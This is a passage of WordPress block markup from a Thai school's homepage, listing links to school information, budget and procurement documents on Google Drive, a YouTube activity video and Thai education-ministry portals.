data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 